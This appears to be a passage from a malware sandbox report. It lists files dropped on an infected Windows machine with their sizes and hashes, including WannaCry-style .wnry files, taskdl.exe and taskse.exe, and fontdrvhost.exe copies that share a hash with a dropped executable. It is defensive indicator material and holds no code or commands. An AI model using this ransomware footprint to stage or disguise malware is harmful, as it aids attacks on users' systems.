                                        • C:\Users\Admin\AppData\Local\Temp\695D.tmp\695E.tmp\695F.bat
                                          Filesize

                                          49B

                                          MD5

                                          76688da2afa9352238f6016e6be4cb97

                                          SHA1

                                          36fd1260f078209c83e49e7daaee3a635167a60f

                                          SHA256

                                          e365685ea938b12790a195383434d825f46c41c80469ce11b9765305780bff7a

                                          SHA512

                                          34659bf4de5c2cbd7cdc7309a48880ac2e1f19e0a4da0c1d4cc45658a81f9f4e7a9293be48e853de812a6b94e1caa3356a715a1a0c14d37b7ae99ba5888bd1df

                                        • C:\Users\Admin\Desktop\1.exe
                                          Filesize

                                          89KB

                                          MD5

                                          69a5fc20b7864e6cf84d0383779877a5

                                          SHA1

                                          6c31649e2dc18a9432b19e52ce7bf2014959be88

                                          SHA256

                                          4fe08cc381f8f4ea6e3d8e34fddf094193ccbbcc1cae7217f0233893b9c566a2

                                          SHA512

                                          f19f3221a26bdab7ddcf18196ef6e6012968c675065c4e56f54faaace18321c07771fdbdacabd365159ccc5bf01e40693146709217e13dcd282609242e61a4bc

                                        • C:\Users\Admin\Desktop\1.exe
                                          Filesize

                                          89KB

                                          MD5

                                          69a5fc20b7864e6cf84d0383779877a5

                                          SHA1

                                          6c31649e2dc18a9432b19e52ce7bf2014959be88

                                          SHA256

                                          4fe08cc381f8f4ea6e3d8e34fddf094193ccbbcc1cae7217f0233893b9c566a2

                                          SHA512

                                          f19f3221a26bdab7ddcf18196ef6e6012968c675065c4e56f54faaace18321c07771fdbdacabd365159ccc5bf01e40693146709217e13dcd282609242e61a4bc

                                        • C:\Users\Admin\Desktop\10.exe
                                          Filesize

                                          3.4MB

                                          MD5

                                          84c82835a5d21bbcf75a61706d8ab549

                                          SHA1

                                          5ff465afaabcbf0150d1a3ab2c2e74f3a4426467

                                          SHA256

                                          ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa

                                          SHA512

                                          90723a50c20ba3643d625595fd6be8dcf88d70ff7f4b4719a88f055d5b3149a4231018ea30d375171507a147e59f73478c0c27948590794554d031e7d54b7244

                                        • C:\Users\Admin\Desktop\10.exe
                                          Filesize

                                          3.4MB

                                          MD5

                                          84c82835a5d21bbcf75a61706d8ab549

                                          SHA1

                                          5ff465afaabcbf0150d1a3ab2c2e74f3a4426467

                                          SHA256

                                          ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa

                                          SHA512

                                          90723a50c20ba3643d625595fd6be8dcf88d70ff7f4b4719a88f055d5b3149a4231018ea30d375171507a147e59f73478c0c27948590794554d031e7d54b7244

                                        • C:\Users\Admin\Desktop\169511651675374.bat
                                          Filesize

                                          318B

                                          MD5

                                          b741d0951bc2d29318d75208913ea377

                                          SHA1

                                          a13de54ccfbd4ea29d9f78b86615b028bd50d0a5

                                          SHA256

                                          595dc1b7a6f1d7933c2d142d773e445dbc7b1a2089243b51193bc7f730b1c8df

                                          SHA512

                                          bf7b44ba7f0cfe093b24f26b288b715c0f0910fa7dc5f318edfc5c4fdc8c9b8a3b6ced5b61672ecfa9820ffd054b5bc2650ae0812804d2b3fc901aa06dd3ca14

                                        • C:\Users\Admin\Desktop\169511651675374.bat
                                          Filesize

                                          318B

                                          MD5

                                          01491aaa529601406eeb1afed57e42f4

                                          SHA1

                                          07d5496a17d10f9e086ddf10591eee1b3d6af712

                                          SHA256

                                          f0eb26127742ddb836a4b91b4cdd91628c046986281e280688ba5adf8813fe06

                                          SHA512

                                          fd8bc835899521f82f5474747e5a71ede2b70636327044be0e348882d1ed651a433351c9e5d90e6980499dd9159b0bef7ccf157f27557f297e586c3b9fc78f36

                                        • C:\Users\Admin\Desktop\2.doc
                                          Filesize

                                          803KB

                                          MD5

                                          7f6c623196d7e76c205b4fb898ad9be6

                                          SHA1

                                          408bb5b4e8ac34ce3b70ba54e00e9858ced885c0

                                          SHA256

                                          3a5648f7de99c4f87331c36983fc8adcd667743569a19c8dafdd5e8a33de154d

                                          SHA512

                                          8a57b3c14fe3f6c7ea014f867924176d3b9c07ad6195b0e5fa877e16b55b1c23e4abfdf24b7e7a0dffafe8991d4878d98dad1419be03f27f64f0c95720542dee

                                        • C:\Users\Admin\Desktop\3.xlsx
                                          Filesize

                                          186KB

                                          MD5

                                          f0601e1e83d083bcefd0c16f718c17dc

                                          SHA1

                                          04973cdb31a5b027951e8abd52d405c8223f01ef

                                          SHA256

                                          8bd1cceb15494645d11d1b7aef481094400ff8436573e9ae58d75f130551e314

                                          SHA512

                                          12e68c4287845adc8eb4ac8a2268638dcb5f1a87bbf276016b620bed4945c41d9d009a43784907f93f9692b9aa61a985bbd635fc7fa91f8088462cc6c86cb658

                                        • C:\Users\Admin\Desktop\5.exe
                                          Filesize

                                          37KB

                                          MD5

                                          e817d74d13c658890ff3a4c01ab44c62

                                          SHA1

                                          bf0b97392e7d56eee0b63dc65efff4db883cb0c7

                                          SHA256

                                          2945881f15e98a18d27108a29963988190853838f34faf3020e6c3c97342672d

                                          SHA512

                                          8d90ef308c1e0b7e01e7732e2cd819f07bfc1ef06e523efa81694ced75550c9f1be460fc9de412faeb96273a6492580402ab9c9538ed441fc26d96b6785e7815

                                        • C:\Users\Admin\Desktop\5.exe
                                          Filesize

                                          37KB

                                          MD5

                                          e817d74d13c658890ff3a4c01ab44c62

                                          SHA1

                                          bf0b97392e7d56eee0b63dc65efff4db883cb0c7

                                          SHA256

                                          2945881f15e98a18d27108a29963988190853838f34faf3020e6c3c97342672d

                                          SHA512

                                          8d90ef308c1e0b7e01e7732e2cd819f07bfc1ef06e523efa81694ced75550c9f1be460fc9de412faeb96273a6492580402ab9c9538ed441fc26d96b6785e7815

                                        • C:\Users\Admin\Desktop\6.exe
                                          Filesize

                                          564KB

                                          MD5

                                          748a4bea8c0624a4c7a69f67263e0839

                                          SHA1

                                          6955b7d516df38992ac6bff9d0b0f5df150df859

                                          SHA256

                                          220d8f8ff82d413c81bd02dfa001e1c478e8fbea44bad24f21b3a5284e15632e

                                          SHA512

                                          5fcdfddce3cc2e636001ed08c5f2f7590aadaa37c091f7ba94e519d298e284362721f1859c6ffbf064ae23e05d4e0e9754b515396812fbe9f9028497396799fd

                                        • C:\Users\Admin\Desktop\6.exe
                                          Filesize

                                          564KB

                                          MD5

                                          748a4bea8c0624a4c7a69f67263e0839

                                          SHA1

                                          6955b7d516df38992ac6bff9d0b0f5df150df859

                                          SHA256

                                          220d8f8ff82d413c81bd02dfa001e1c478e8fbea44bad24f21b3a5284e15632e

                                          SHA512

                                          5fcdfddce3cc2e636001ed08c5f2f7590aadaa37c091f7ba94e519d298e284362721f1859c6ffbf064ae23e05d4e0e9754b515396812fbe9f9028497396799fd

                                        • C:\Users\Admin\Desktop\7.exe
                                          Filesize

                                          892KB

                                          MD5

                                          ed666bf7f4a0766fcec0e9c8074b089b

                                          SHA1

                                          1b90f1a4cb6059d573fff115b3598604825d76e6

                                          SHA256

                                          d1330d349bfbd3aea545fa08ef63339e82a3f4d04e27216ecc4c45304f079264

                                          SHA512

                                          d0791eaa9859d751f946fd3252d2056c29328fc97e147a5234a52a3728588a3a1aaa003a8e32863d338ebdca92305c48b6fa12ca1e620cf27460bf091c3b6d49

                                        • C:\Users\Admin\Desktop\7.exe
                                          Filesize

                                          892KB

                                          MD5

                                          ed666bf7f4a0766fcec0e9c8074b089b

                                          SHA1

                                          1b90f1a4cb6059d573fff115b3598604825d76e6

                                          SHA256

                                          d1330d349bfbd3aea545fa08ef63339e82a3f4d04e27216ecc4c45304f079264

                                          SHA512

                                          d0791eaa9859d751f946fd3252d2056c29328fc97e147a5234a52a3728588a3a1aaa003a8e32863d338ebdca92305c48b6fa12ca1e620cf27460bf091c3b6d49

                                        • C:\Users\Admin\Desktop\8.exe
                                          Filesize

                                          898KB

                                          MD5

                                          61b32a82577a7ea823ff7303ab6b4283

                                          SHA1

                                          9107c719795fa5768498abb4fed11d907e44d55e

                                          SHA256

                                          4263eacd358d5ef9efacff1f63ff79487639136c0268938755a4bfe3f5797167

                                          SHA512

                                          86ac9d3d0804f5dd3ebe08ab59058363bceeaa3f42d2d482f97ce688837b3b81693fde2b973250b93ee3223318b0f8e4f2faf6b0f91017807feacabce979d700

                                        • C:\Users\Admin\Desktop\8.exe
                                          Filesize

                                          898KB

                                          MD5

                                          61b32a82577a7ea823ff7303ab6b4283

                                          SHA1

                                          9107c719795fa5768498abb4fed11d907e44d55e

                                          SHA256

                                          4263eacd358d5ef9efacff1f63ff79487639136c0268938755a4bfe3f5797167

                                          SHA512

                                          86ac9d3d0804f5dd3ebe08ab59058363bceeaa3f42d2d482f97ce688837b3b81693fde2b973250b93ee3223318b0f8e4f2faf6b0f91017807feacabce979d700

                                        • C:\Users\Admin\Desktop\9.docm
                                          Filesize

                                          134KB

                                          MD5

                                          8d4493d08bce3e7cf8fba4cae87684e9

                                          SHA1

                                          7f3f186f4461927f2353a9fc0c82b0bdd8f86971

                                          SHA256

                                          f42d7efef3ee3a832d8c15fc90470c58aa8458a25b2deeaedb8f613f7ffa04a2

                                          SHA512

                                          616fdc97edceffe003b6884e15077c85f7015e2956a4b8d845ba62e0c7d6a723cce657c0b4be62c7a6fd034a57f2f987a1a6a366a3965ed5cfe886199dcdfe39

                                        • C:\Users\Admin\Desktop\b.wnry
                                          Filesize

                                          1.4MB

                                          MD5

                                          c17170262312f3be7027bc2ca825bf0c

                                          SHA1

                                          f19eceda82973239a1fdc5826bce7691e5dcb4fb

                                          SHA256

                                          d5e0e8694ddc0548d8e6b87c83d50f4ab85c1debadb106d6a6a794c3e746f4fa

                                          SHA512

                                          c6160fd03ad659c8dd9cf2a83f9fdcd34f2db4f8f27f33c5afd52aced49dfa9ce4909211c221a0479dbbb6e6c985385557c495fc04d3400ff21a0fbbae42ee7c

                                        • C:\Users\Admin\Desktop\c.wnry
                                          Filesize

                                          780B

                                          MD5

                                          383a85eab6ecda319bfddd82416fc6c2

                                          SHA1

                                          2a9324e1d02c3e41582bf5370043d8afeb02ba6f

                                          SHA256

                                          079ce1041cbffe18ff62a2b4a33711eda40f680d0b1d3b551db47e39a6390b21

                                          SHA512

                                          c661e0b3c175d31b365362e52d7b152267a15d59517a4bcc493329be20b23d0e4eb62d1ba80bb96447eeaf91a6901f4b34bf173b4ab6f90d4111ea97c87c1252

                                        • C:\Users\Admin\Desktop\msg\m_bulgarian.wnry
                                          Filesize

                                          46KB

                                          MD5

                                          95673b0f968c0f55b32204361940d184

                                          SHA1

                                          81e427d15a1a826b93e91c3d2fa65221c8ca9cff

                                          SHA256

                                          40b37e7b80cf678d7dd302aaf41b88135ade6ddf44d89bdba19cf171564444bd

                                          SHA512

                                          7601f1883edbb4150a9dc17084012323b3bfa66f6d19d3d0355cf82b6a1c9dce475d758da18b6d17a8b321bf6fca20915224dbaedcb3f4d16abfaf7a5fc21b92

                                        • C:\Users\Admin\Desktop\msg\m_chinese (simplified).wnry
                                          Filesize

                                          53KB

                                          MD5

                                          0252d45ca21c8e43c9742285c48e91ad

                                          SHA1

                                          5c14551d2736eef3a1c1970cc492206e531703c1

                                          SHA256

                                          845d0e178aeebd6c7e2a2e9697b2bf6cf02028c50c288b3ba88fe2918ea2834a

                                          SHA512

                                          1bfcf6c0e7c977d777f12bd20ac347630999c4d99bd706b40de7ff8f2f52e02560d68093142cc93722095657807a1480ce3fb6a2e000c488550548c497998755

                                        • C:\Users\Admin\Desktop\msg\m_chinese (traditional).wnry
                                          Filesize

                                          77KB

                                          MD5

                                          2efc3690d67cd073a9406a25005f7cea

                                          SHA1

                                          52c07f98870eabace6ec370b7eb562751e8067e9

                                          SHA256

                                          5c7f6ad1ec4bc2c8e2c9c126633215daba7de731ac8b12be10ca157417c97f3a

                                          SHA512

                                          0766c58e64d9cda5328e00b86f8482316e944aa2c26523a3c37289e22c34be4b70937033bebdb217f675e40db9fecdce0a0d516f9065a170e28286c2d218487c

                                        • C:\Users\Admin\Desktop\msg\m_croatian.wnry
                                          Filesize

                                          38KB

                                          MD5

                                          17194003fa70ce477326ce2f6deeb270

                                          SHA1

                                          e325988f68d327743926ea317abb9882f347fa73

                                          SHA256

                                          3f33734b2d34cce83936ce99c3494cd845f1d2c02d7f6da31d42dfc1ca15a171

                                          SHA512

                                          dcf4ccf0b352a8b271827b3b8e181f7d6502ca0f8c9dda3dc6e53441bb4ae6e77b49c9c947cc3ede0bf323f09140a0c068a907f3c23ea2a8495d1ad96820051c

                                        • C:\Users\Admin\Desktop\msg\m_czech.wnry
                                          Filesize

                                          39KB

                                          MD5

                                          537efeecdfa94cc421e58fd82a58ba9e

                                          SHA1

                                          3609456e16bc16ba447979f3aa69221290ec17d0

                                          SHA256

                                          5afa4753afa048c6d6c39327ce674f27f5f6e5d3f2a060b7a8aed61725481150

                                          SHA512

                                          e007786ffa09ccd5a24e5c6504c8de444929a2faaafad3712367c05615b7e1b0fbf7fbfff7028ed3f832ce226957390d8bf54308870e9ed597948a838da1137b

                                        • C:\Users\Admin\Desktop\msg\m_danish.wnry
                                          Filesize

                                          36KB

                                          MD5

                                          2c5a3b81d5c4715b7bea01033367fcb5

                                          SHA1

                                          b548b45da8463e17199daafd34c23591f94e82cd

                                          SHA256

                                          a75bb44284b9db8d702692f84909a7e23f21141866adf3db888042e9109a1cb6

                                          SHA512

                                          490c5a892fac801b853c348477b1140755d4c53ca05726ac19d3649af4285c93523393a3667e209c71c80ac06ffd809f62dd69ae65012dcb00445d032f1277b3

                                        • C:\Users\Admin\Desktop\msg\m_dutch.wnry
                                          Filesize

                                          36KB

                                          MD5

                                          7a8d499407c6a647c03c4471a67eaad7

                                          SHA1

                                          d573b6ac8e7e04a05cbbd6b7f6a9842f371d343b

                                          SHA256

                                          2c95bef914da6c50d7bdedec601e589fbb4fda24c4863a7260f4f72bd025799c

                                          SHA512

                                          608ef3ff0a517fe1e70ff41aeb277821565c5a9bee5103aa5e45c68d4763fce507c2a34d810f4cd242d163181f8341d9a69e93fe32aded6fbc7f544c55743f12

                                        • C:\Users\Admin\Desktop\msg\m_english.wnry
                                          Filesize

                                          36KB

                                          MD5

                                          fe68c2dc0d2419b38f44d83f2fcf232e

                                          SHA1

                                          6c6e49949957215aa2f3dfb72207d249adf36283

                                          SHA256

                                          26fd072fda6e12f8c2d3292086ef0390785efa2c556e2a88bd4673102af703e5

                                          SHA512

                                          941fa0a1f6a5756ed54260994db6158a7ebeb9e18b5c8ca2f6530c579bc4455918df0b38c609f501ca466b3cc067b40e4b861ad6513373b483b36338ae20a810

                                        • C:\Users\Admin\Desktop\msg\m_filipino.wnry
                                          Filesize

                                          36KB

                                          MD5

                                          08b9e69b57e4c9b966664f8e1c27ab09

                                          SHA1

                                          2da1025bbbfb3cd308070765fc0893a48e5a85fa

                                          SHA256

                                          d8489f8c16318e524b45de8b35d7e2c3cd8ed4821c136f12f5ef3c9fc3321324

                                          SHA512

                                          966b5ed68be6b5ccd46e0de1fa868cfe5432d9bf82e1e2f6eb99b2aef3c92f88d96f4f4eec5e16381b9c6db80a68071e7124ca1474d664bdd77e1817ec600cb4

                                        • C:\Users\Admin\Desktop\msg\m_finnish.wnry
                                          Filesize

                                          37KB

                                          MD5

                                          35c2f97eea8819b1caebd23fee732d8f

                                          SHA1

                                          e354d1cc43d6a39d9732adea5d3b0f57284255d2

                                          SHA256

                                          1adfee058b98206cb4fbe1a46d3ed62a11e1dee2c7ff521c1eef7c706e6a700e

                                          SHA512

                                          908149a6f5238fcccd86f7c374986d486590a0991ef5243f0cd9e63cc8e208158a9a812665233b09c3a478233d30f21e3d355b94f36b83644795556f147345bf

                                        • C:\Users\Admin\Desktop\msg\m_french.wnry
                                          Filesize

                                          37KB

                                          MD5

                                          4e57113a6bf6b88fdd32782a4a381274

                                          SHA1

                                          0fccbc91f0f94453d91670c6794f71348711061d

                                          SHA256

                                          9bd38110e6523547aed50617ddc77d0920d408faeed2b7a21ab163fda22177bc

                                          SHA512

                                          4f1918a12269c654d44e9d394bc209ef0bc32242be8833a2fba437b879125177e149f56f2fb0c302330dec328139b34982c04b3fefb045612b6cc9f83ec85aa9

                                        • C:\Users\Admin\Desktop\msg\m_german.wnry
                                          Filesize

                                          36KB

                                          MD5

                                          3d59bbb5553fe03a89f817819540f469

                                          SHA1

                                          26781d4b06ff704800b463d0f1fca3afd923a9fe

                                          SHA256

                                          2adc900fafa9938d85ce53cb793271f37af40cf499bcc454f44975db533f0b61

                                          SHA512

                                          95719ae80589f71209bb3cb953276538040e7111b994d757b0a24283aefe27aadbbe9eef3f1f823ce4cabc1090946d4a2a558607ac6cac6faca5971529b34dac

                                        • C:\Users\Admin\Desktop\msg\m_greek.wnry
                                          Filesize

                                          47KB

                                          MD5

                                          fb4e8718fea95bb7479727fde80cb424

                                          SHA1

                                          1088c7653cba385fe994e9ae34a6595898f20aeb

                                          SHA256

                                          e13cc9b13aa5074dc45d50379eceb17ee39a0c2531ab617d93800fe236758ca9

                                          SHA512

                                          24db377af1569e4e2b2ebccec42564cea95a30f1ff43bcaf25a692f99567e027bcef4aacef008ec5f64ea2eef0c04be88d2b30bcadabb3919b5f45a6633940cb

                                        • C:\Users\Admin\Desktop\msg\m_indonesian.wnry
                                          Filesize

                                          36KB

                                          MD5

                                          3788f91c694dfc48e12417ce93356b0f

                                          SHA1

                                          eb3b87f7f654b604daf3484da9e02ca6c4ea98b7

                                          SHA256

                                          23e5e738aad10fb8ef89aa0285269aff728070080158fd3e7792fe9ed47c51f4

                                          SHA512

                                          b7dd9e6dc7c2d023ff958caf132f0544c76fae3b2d8e49753257676cc541735807b4befdf483bcae94c2dcde3c878c783b4a89dca0fecbc78f5bbf7c356f35cd

                                        • C:\Users\Admin\Desktop\msg\m_italian.wnry
                                          Filesize

                                          36KB

                                          MD5

                                          30a200f78498990095b36f574b6e8690

                                          SHA1

                                          c4b1b3c087bd12b063e98bca464cd05f3f7b7882

                                          SHA256

                                          49f2c739e7d9745c0834dc817a71bf6676ccc24a4c28dcddf8844093aab3df07

                                          SHA512

                                          c0da2aae82c397f6943a0a7b838f60eeef8f57192c5f498f2ecf05db824cfeb6d6ca830bf3715da7ee400aa8362bd64dc835298f3f0085ae7a744e6e6c690511

                                        • C:\Users\Admin\Desktop\msg\m_japanese.wnry
                                          Filesize

                                          79KB

                                          MD5

                                          b77e1221f7ecd0b5d696cb66cda1609e

                                          SHA1

                                          51eb7a254a33d05edf188ded653005dc82de8a46

                                          SHA256

                                          7e491e7b48d6e34f916624c1cda9f024e86fcbec56acda35e27fa99d530d017e

                                          SHA512

                                          f435fd67954787e6b87460db026759410fbd25b2f6ea758118749c113a50192446861a114358443a129be817020b50f21d27b1ebd3d22c7be62082e8b45223fc

                                        • C:\Users\Admin\Desktop\msg\m_korean.wnry
                                          Filesize

                                          89KB

                                          MD5

                                          6735cb43fe44832b061eeb3f5956b099

                                          SHA1

                                          d636daf64d524f81367ea92fdafa3726c909bee1

                                          SHA256

                                          552aa0f82f37c9601114974228d4fc54f7434fe3ae7a276ef1ae98a0f608f1d0

                                          SHA512

                                          60272801909dbba21578b22c49f6b0ba8cd0070f116476ff35b3ac8347b987790e4cc0334724244c4b13415a246e77a577230029e4561ae6f04a598c3f536c7e

                                        • C:\Users\Admin\Desktop\msg\m_latvian.wnry
                                          Filesize

                                          40KB

                                          MD5

                                          c33afb4ecc04ee1bcc6975bea49abe40

                                          SHA1

                                          fbea4f170507cde02b839527ef50b7ec74b4821f

                                          SHA256

                                          a0356696877f2d94d645ae2df6ce6b370bd5c0d6db3d36def44e714525de0536

                                          SHA512

                                          0d435f0836f61a5ff55b78c02fa47b191e5807a79d8a6e991f3115743df2141b3db42ba8bdad9ad259e12f5800828e9e72d7c94a6a5259312a447d669b03ec44

                                        • C:\Users\Admin\Desktop\msg\m_norwegian.wnry
                                          Filesize

                                          36KB

                                          MD5

                                          ff70cc7c00951084175d12128ce02399

                                          SHA1

                                          75ad3b1ad4fb14813882d88e952208c648f1fd18

                                          SHA256

                                          cb5da96b3dfcf4394713623dbf3831b2a0b8be63987f563e1c32edeb74cb6c3a

                                          SHA512

                                          f01df3256d49325e5ec49fd265aa3f176020c8ffec60eb1d828c75a3fa18ff8634e1de824d77dfdd833768acff1f547303104620c70066a2708654a07ef22e19

                                        • C:\Users\Admin\Desktop\msg\m_polish.wnry
                                          Filesize

                                          38KB

                                          MD5

                                          e79d7f2833a9c2e2553c7fe04a1b63f4

                                          SHA1

                                          3d9f56d2381b8fe16042aa7c4feb1b33f2baebff

                                          SHA256

                                          519ad66009a6c127400c6c09e079903223bd82ecc18ad71b8e5cd79f5f9c053e

                                          SHA512

                                          e0159c753491cac7606a7250f332e87bc6b14876bc7a1cf5625fa56ab4f09c485f7b231dd52e4ff0f5f3c29862afb1124c0efd0741613eb97a83cbe2668af5de

                                        • C:\Users\Admin\Desktop\msg\m_portuguese.wnry
                                          Filesize

                                          37KB

                                          MD5

                                          fa948f7d8dfb21ceddd6794f2d56b44f

                                          SHA1

                                          ca915fbe020caa88dd776d89632d7866f660fc7a

                                          SHA256

                                          bd9f4b3aedf4f81f37ec0a028aabcb0e9a900e6b4de04e9271c8db81432e2a66

                                          SHA512

                                          0d211bfb0ae953081dca00cd07f8c908c174fd6c47a8001fadc614203f0e55d9fbb7fa9b87c735d57101341ab36af443918ee00737ed4c19ace0a2b85497f41a

                                        • C:\Users\Admin\Desktop\msg\m_romanian.wnry
                                          Filesize

                                          50KB

                                          MD5

                                          313e0ececd24f4fa1504118a11bc7986

                                          SHA1

                                          e1b9ae804c7fb1d27f39db18dc0647bb04e75e9d

                                          SHA256

                                          70c0f32ed379ae899e5ac975e20bbbacd295cf7cd50c36174d2602420c770ac1

                                          SHA512

                                          c7500363c61baf8b77fce796d750f8f5e6886ff0a10f81c3240ea3ad4e5f101b597490dea8ab6bd9193457d35d8fd579fce1b88a1c8d85ebe96c66d909630730

                                        • C:\Users\Admin\Desktop\msg\m_russian.wnry
                                          Filesize

                                          46KB

                                          MD5

                                          452615db2336d60af7e2057481e4cab5

                                          SHA1

                                          442e31f6556b3d7de6eb85fbac3d2957b7f5eac6

                                          SHA256

                                          02932052fafe97e6acaaf9f391738a3a826f5434b1a013abbfa7a6c1ade1e078

                                          SHA512

                                          7613dc329abe7a3f32164c9a6b660f209a84b774ab9c008bf6503c76255b30ea9a743a6dc49a8de8df0bcb9aea5a33f7408ba27848d9562583ff51991910911f

                                        • C:\Users\Admin\Desktop\msg\m_slovak.wnry
                                          Filesize

                                          40KB

                                          MD5

                                          c911aba4ab1da6c28cf86338ab2ab6cc

                                          SHA1

                                          fee0fd58b8efe76077620d8abc7500dbfef7c5b0

                                          SHA256

                                          e64178e339c8e10eac17a236a67b892d0447eb67b1dcd149763dad6fd9f72729

                                          SHA512

                                          3491ed285a091a123a1a6d61aafbb8d5621ccc9e045a237a2f9c2cf6049e7420eb96ef30fdcea856b50454436e2ec468770f8d585752d73fafd676c4ef5e800a

                                        • C:\Users\Admin\Desktop\msg\m_spanish.wnry
                                          Filesize

                                          36KB

                                          MD5

                                          8d61648d34cba8ae9d1e2a219019add1

                                          SHA1

                                          2091e42fc17a0cc2f235650f7aad87abf8ba22c2

                                          SHA256

                                          72f20024b2f69b45a1391f0a6474e9f6349625ce329f5444aec7401fe31f8de1

                                          SHA512

                                          68489c33ba89edfe2e3aebaacf8ef848d2ea88dcbef9609c258662605e02d12cfa4ffdc1d266fc5878488e296d2848b2cb0bbd45f1e86ef959bab6162d284079

                                        • C:\Users\Admin\Desktop\msg\m_swedish.wnry
                                          Filesize

                                          37KB

                                          MD5

                                          c7a19984eb9f37198652eaf2fd1ee25c

                                          SHA1

                                          06eafed025cf8c4d76966bf382ab0c5e1bd6a0ae

                                          SHA256

                                          146f61db72297c9c0facffd560487f8d6a2846ecec92ecc7db19c8d618dbc3a4

                                          SHA512

                                          43dd159f9c2eac147cbff1dda83f6a83dd0c59d2d7acac35ba8b407a04ec9a1110a6a8737535d060d100ede1cb75078cf742c383948c9d4037ef459d150f6020

                                        • C:\Users\Admin\Desktop\msg\m_turkish.wnry
                                          Filesize

                                          41KB

                                          MD5

                                          531ba6b1a5460fc9446946f91cc8c94b

                                          SHA1

                                          cc56978681bd546fd82d87926b5d9905c92a5803

                                          SHA256

                                          6db650836d64350bbde2ab324407b8e474fc041098c41ecac6fd77d632a36415

                                          SHA512

                                          ef25c3cf4343df85954114f59933c7cc8107266c8bcac3b5ea7718eb74dbee8ca8a02da39057e6ef26b64f1dfccd720dd3bf473f5ae340ba56941e87d6b796c9

                                        • C:\Users\Admin\Desktop\msg\m_vietnamese.wnry
                                          Filesize

                                          91KB

                                          MD5

                                          8419be28a0dcec3f55823620922b00fa

                                          SHA1

                                          2e4791f9cdfca8abf345d606f313d22b36c46b92

                                          SHA256

                                          1f21838b244c80f8bed6f6977aa8a557b419cf22ba35b1fd4bf0f98989c5bdf8

                                          SHA512

                                          8fca77e54480aea3c0c7a705263ed8fb83c58974f5f0f62f12cc97c8e0506ba2cdb59b70e59e9a6c44dd7cde6adeeec35b494d31a6a146ff5ba7006136ab9386

                                        • C:\Users\Admin\Desktop\r.wnry
                                          Filesize

                                          864B

                                          MD5

                                          3e0020fc529b1c2a061016dd2469ba96

                                          SHA1

                                          c3a91c22b63f6fe709e7c29cafb29a2ee83e6ade

                                          SHA256

                                          402751fa49e0cb68fe052cb3db87b05e71c1d950984d339940cf6b29409f2a7c

                                          SHA512

                                          5ca3c134201ed39d96d72911c0498bae6f98701513fd7f1dc8512819b673f0ea580510fa94ed9413ccc73da18b39903772a7cbfa3478176181cee68c896e14cf

                                        • C:\Users\Admin\Desktop\s.wnry
                                          Filesize

                                          2.9MB

                                          MD5

                                          ad4c9de7c8c40813f200ba1c2fa33083

                                          SHA1

                                          d1af27518d455d432b62d73c6a1497d032f6120e

                                          SHA256

                                          e18fdd912dfe5b45776e68d578c3af3547886cf1353d7086c8bee037436dff4b

                                          SHA512

                                          115733d08e5f1a514808a20b070db7ff453fd149865f49c04365a8c6502fa1e5c3a31da3e21f688ab040f583cf1224a544aea9708ffab21405dde1c57f98e617

                                        • C:\Users\Admin\Desktop\t.wnry
                                          Filesize

                                          64KB

                                          MD5

                                          5dcaac857e695a65f5c3ef1441a73a8f

                                          SHA1

                                          7b10aaeee05e7a1efb43d9f837e9356ad55c07dd

                                          SHA256

                                          97ebce49b14c46bebc9ec2448d00e1e397123b256e2be9eba5140688e7bc0ae6

                                          SHA512

                                          06eb5e49d19b71a99770d1b11a5bb64a54bf3352f36e39a153469e54205075c203b08128dc2317259db206ab5323bdd93aaa252a066f57fb5c52ff28deedb5e2

                                        • C:\Users\Admin\Desktop\taskdl.exe
                                          Filesize

                                          20KB

                                          MD5

                                          4fef5e34143e646dbf9907c4374276f5

                                          SHA1

                                          47a9ad4125b6bd7c55e4e7da251e23f089407b8f

                                          SHA256

                                          4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79

                                          SHA512

                                          4550dd1787deb353ebd28363dd2cdccca861f6a5d9358120fa6aa23baa478b2a9eb43cef5e3f6426f708a0753491710ac05483fac4a046c26bec4234122434d5

                                        • C:\Users\Admin\Desktop\taskdl.exe
                                          Filesize

                                          20KB

                                          MD5

                                          4fef5e34143e646dbf9907c4374276f5

                                          SHA1

                                          47a9ad4125b6bd7c55e4e7da251e23f089407b8f

                                          SHA256

                                          4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79

                                          SHA512

                                          4550dd1787deb353ebd28363dd2cdccca861f6a5d9358120fa6aa23baa478b2a9eb43cef5e3f6426f708a0753491710ac05483fac4a046c26bec4234122434d5

                                        • C:\Users\Admin\Desktop\taskse.exe
                                          Filesize

                                          20KB

                                          MD5

                                          8495400f199ac77853c53b5a3f278f3e

                                          SHA1

                                          be5d6279874da315e3080b06083757aad9b32c23

                                          SHA256

                                          2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d

                                          SHA512

                                          0669c524a295a049fa4629b26f89788b2a74e1840bcdc50e093a0bd40830dd1279c9597937301c0072db6ece70adee4ace67c3c8a4fb2db6deafd8f1e887abe4

                                        • C:\Users\Admin\Desktop\u.wnry
                                          Filesize

                                          240KB

                                          MD5

                                          7bf2b57f2a205768755c07f238fb32cc

                                          SHA1

                                          45356a9dd616ed7161a3b9192e2f318d0ab5ad10

                                          SHA256

                                          b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25

                                          SHA512

                                          91a39e919296cb5c6eccba710b780519d90035175aa460ec6dbe631324e5e5753bd8d87f395b5481bcd7e1ad623b31a34382d81faae06bef60ec28b49c3122a9

                                        • C:\Users\Default User\fontdrvhost.exe
                                          Filesize

                                          564KB

                                          MD5

                                          748a4bea8c0624a4c7a69f67263e0839

                                          SHA1

                                          6955b7d516df38992ac6bff9d0b0f5df150df859

                                          SHA256

                                          220d8f8ff82d413c81bd02dfa001e1c478e8fbea44bad24f21b3a5284e15632e

                                          SHA512

                                          5fcdfddce3cc2e636001ed08c5f2f7590aadaa37c091f7ba94e519d298e284362721f1859c6ffbf064ae23e05d4e0e9754b515396812fbe9f9028497396799fd

                                        • C:\Users\Default\fontdrvhost.exe
                                          Filesize

                                          564KB

                                          MD5

                                          748a4bea8c0624a4c7a69f67263e0839

                                          SHA1

                                          6955b7d516df38992ac6bff9d0b0f5df150df859

                                          SHA256

                                          220d8f8ff82d413c81bd02dfa001e1c478e8fbea44bad24f21b3a5284e15632e

                                          SHA512

                                          5fcdfddce3cc2e636001ed08c5f2f7590aadaa37c091f7ba94e519d298e284362721f1859c6ffbf064ae23e05d4e0e9754b515396812fbe9f9028497396799fd

                                        • \??\pipe\LOCAL\crashpad_4552_HJOCCENJXAWYGLZB
                                          MD5

